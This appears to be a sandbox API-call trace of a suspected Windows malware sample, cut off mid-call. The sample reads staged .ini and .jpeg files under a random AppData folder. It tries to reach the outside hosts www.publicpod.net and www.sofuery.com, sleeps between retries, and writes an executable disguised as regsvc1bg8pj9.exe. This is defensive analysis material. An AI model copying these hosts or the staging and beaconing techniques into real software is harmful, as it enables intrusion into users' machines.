RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0x13ac, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0249.060] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0249.060] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0249.060] NtQueryInformationFile (in: FileHandle=0x13ac, IoStatusBlock=0x26ef640, FileInformation=0x26ef650, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x26ef640, FileInformation=0x26ef650) returned 0x0 [0249.060] NtReadFile (in: FileHandle=0x13ac, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x26ef640, Buffer=0x259185a, BufferLength=0x28, ByteOffset=0x26ef638*=0, Key=0x0 | out: IoStatusBlock=0x26ef640, Buffer=0x259185a*) returned 0x0 [0249.060] NtClose (Handle=0x13ac) returned 0x0 [0249.061] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0249.061] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0249.061] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0249.061] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0249.061] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0249.061] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0249.061] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0249.061] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0249.061] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtPathName=0x26ef660, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0249.061] NtCreateFile (in: FileHandle=0x26ef600, DesiredAccess=0x120089, ObjectAttributes=0x26ef670*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef610, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef600*=0x13ac, IoStatusBlock=0x26ef610*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0249.061] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef580 | out: HeapArray=0x26ef580*=0x300000) returned 0x11 [0249.061] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0249.061] NtQueryInformationFile (in: FileHandle=0x13ac, IoStatusBlock=0x26ef610, FileInformation=0x26ef620, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x26ef610, FileInformation=0x26ef620) returned 0x0 [0249.061] NtReadFile (in: FileHandle=0x13ac, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x26ef610, Buffer=0x8fb984d, BufferLength=0x2ba28, ByteOffset=0x26ef608*=0, Key=0x0 | out: IoStatusBlock=0x26ef610, Buffer=0x8fb984d*) returned 0x0 [0249.061] NtClose (Handle=0x13ac) returned 0x0 [0249.062] getaddrinfo (in: pNodeName="www.publicpod.net", pServiceName="80", pHints=0x6f0c638*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x6f0c668 | out: ppResult=0x6f0c668*=0x0) returned 11001 [0249.062] Sleep (dwMilliseconds=0x7d0) [0249.073] Sleep (dwMilliseconds=0x7d0) [0249.089] Sleep (dwMilliseconds=0x7d0) [0249.104] Sleep (dwMilliseconds=0x7d0) [0249.120] Sleep (dwMilliseconds=0x7d0) [0249.136] Sleep (dwMilliseconds=0x7d0) [0249.151] Sleep (dwMilliseconds=0x7d0) [0249.167] Sleep (dwMilliseconds=0x7d0) [0249.182] Sleep (dwMilliseconds=0x7d0) [0249.198] Sleep (dwMilliseconds=0x7d0) [0249.214] Sleep (dwMilliseconds=0x7d0) [0249.229] Sleep (dwMilliseconds=0x7d0) [0249.245] Sleep (dwMilliseconds=0x7d0) [0249.260] Sleep (dwMilliseconds=0x7d0) [0249.276] Sleep (dwMilliseconds=0x7d0) [0249.291] Sleep (dwMilliseconds=0x7d0) [0249.307] Sleep (dwMilliseconds=0x7d0) [0249.322] Sleep (dwMilliseconds=0x7d0) [0249.338] Sleep (dwMilliseconds=0x7d0) [0249.355] Sleep (dwMilliseconds=0x7d0) [0249.370] Sleep (dwMilliseconds=0x7d0) [0249.385] socket (af=2, type=1, protocol=6) returned 0x13ac [0249.385] getaddrinfo (in: pNodeName="www.sofuery.com", pServiceName="80", pHints=0x6f0c9d8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x6f0ca08 | out: ppResult=0x6f0ca08*=0x0) returned 11001 [0252.258] Sleep (dwMilliseconds=0x7d0) [0252.271] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtPathName=0x26ef6d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0252.271] NtCreateFile (in: FileHandle=0x26ef670, DesiredAccess=0x120089, ObjectAttributes=0x26ef6e0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef680, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef670*=0xffffffffffffffff, IoStatusBlock=0x26ef680*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0252.271] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5f0 | out: HeapArray=0x26ef5f0*=0x300000) returned 0x11 [0252.271] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0252.271] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0252.271] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xa94, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0252.272] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0252.272] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0252.272] NtQueryInformationFile (in: FileHandle=0xa94, IoStatusBlock=0x26ef640, FileInformation=0x26ef650, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x26ef640, FileInformation=0x26ef650) returned 0x0 [0252.272] NtReadFile (in: FileHandle=0xa94, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x26ef640, Buffer=0x259185a, BufferLength=0x28, ByteOffset=0x26ef638*=0, Key=0x0 | out: IoStatusBlock=0x26ef640, Buffer=0x259185a*) returned 0x0 [0252.273] NtClose (Handle=0xa94) returned 0x0 [0252.273] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0252.273] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0252.273] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0252.273] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0252.273] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0252.273] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0252.274] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0252.274] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0252.274] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0252.274] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0252.274] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0252.274] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0252.274] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0252.274] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xa94, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0252.274] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0252.274] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0252.274] NtQueryInformationFile (in: FileHandle=0xa94, IoStatusBlock=0x26ef640, FileInformation=0x26ef650, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x26ef640, FileInformation=0x26ef650) returned 0x0 [0252.274] NtReadFile (in: FileHandle=0xa94, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x26ef640, Buffer=0x259185a, BufferLength=0x6ea, ByteOffset=0x26ef638*=0, Key=0x0 | out: IoStatusBlock=0x26ef640, Buffer=0x259185a*) returned 0x0 [0252.275] NtClose (Handle=0xa94) returned 0x0 [0252.275] getaddrinfo (in: pNodeName="www.sofuery.com", pServiceName="80", pHints=0x6f0c9d8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x6f0ca08 | out: ppResult=0x6f0ca08*=0x0) returned 11001 [0254.594] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0254.594] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0254.594] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0254.594] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0254.594] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0254.594] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xb8c, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0254.595] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0254.595] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0254.595] NtQueryInformationFile (in: FileHandle=0xb8c, IoStatusBlock=0x26ef640, FileInformation=0x26ef650, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x26ef640, FileInformation=0x26ef650) returned 0x0 [0254.595] NtReadFile (in: FileHandle=0xb8c, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x26ef640, Buffer=0x259185a, BufferLength=0x28, ByteOffset=0x26ef638*=0, Key=0x0 | out: IoStatusBlock=0x26ef640, Buffer=0x259185a*) returned 0x0 [0254.596] NtClose (Handle=0xb8c) returned 0x0 [0254.597] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0254.597] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0254.597] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0254.597] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0254.597] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0254.597] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0254.597] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0254.597] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0254.597] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtPathName=0x26ef660, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0254.597] NtCreateFile (in: FileHandle=0x26ef600, DesiredAccess=0x120089, ObjectAttributes=0x26ef670*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef610, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef600*=0xb8c, IoStatusBlock=0x26ef610*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0254.597] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef580 | out: HeapArray=0x26ef580*=0x300000) returned 0x11 [0254.597] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0254.597] NtQueryInformationFile (in: FileHandle=0xb8c, IoStatusBlock=0x26ef610, FileInformation=0x26ef620, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x26ef610, FileInformation=0x26ef620) returned 0x0 [0254.597] NtReadFile (in: FileHandle=0xb8c, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x26ef610, Buffer=0x8fb984d, BufferLength=0x2ba28, ByteOffset=0x26ef608*=0, Key=0x0 | out: IoStatusBlock=0x26ef610, Buffer=0x8fb984d*) returned 0x0 [0254.600] NtClose (Handle=0xb8c) returned 0x0 [0254.600] getaddrinfo (in: pNodeName="www.sofuery.com", pServiceName="80", pHints=0x6f0c9d8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x6f0ca08 | out: ppResult=0x6f0ca08*=0x0) returned 11001 [0256.940] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x26ef950, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0256.941] NtCreateFile (in: FileHandle=0x26ef8f0, DesiredAccess=0x120089, ObjectAttributes=0x26ef960*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef900, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef8f0*=0xffffffffffffffff, IoStatusBlock=0x26ef900*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0256.941] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef870 | out: HeapArray=0x26ef870*=0x300000) returned 0x11 [0256.941] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3e19c40) returned 1 [0256.941] CreateDirectoryW (lpPathName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Gjptlgbx0" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\gjptlgbx0"), lpSecurityAttributes=0x0) returned 1 [0256.947] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x26ef4c0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0256.947] NtCreateFile (in: FileHandle=0x26ef460, DesiredAccess=0x12019f, ObjectAttributes=0x26ef4d0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef470, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef460*=0xa94, IoStatusBlock=0x26ef470*(Status=0x0, Pointer=0x0, Information=0x2)) returned 0x0 [0256.948] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef3e0 | out: HeapArray=0x26ef3e0*=0x300000) returned 0x11 [0256.948] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3e19c40) returned 1 [0256.948] NtQueryInformationFile (in: FileHandle=0xa94, IoStatusBlock=0x26ef470, FileInformation=0x26ef480, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x26ef470, FileInformation=0x26ef480) returned 0x0 [0256.971] NtWriteFile (in: FileHandle=0xa94, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x26ef470, 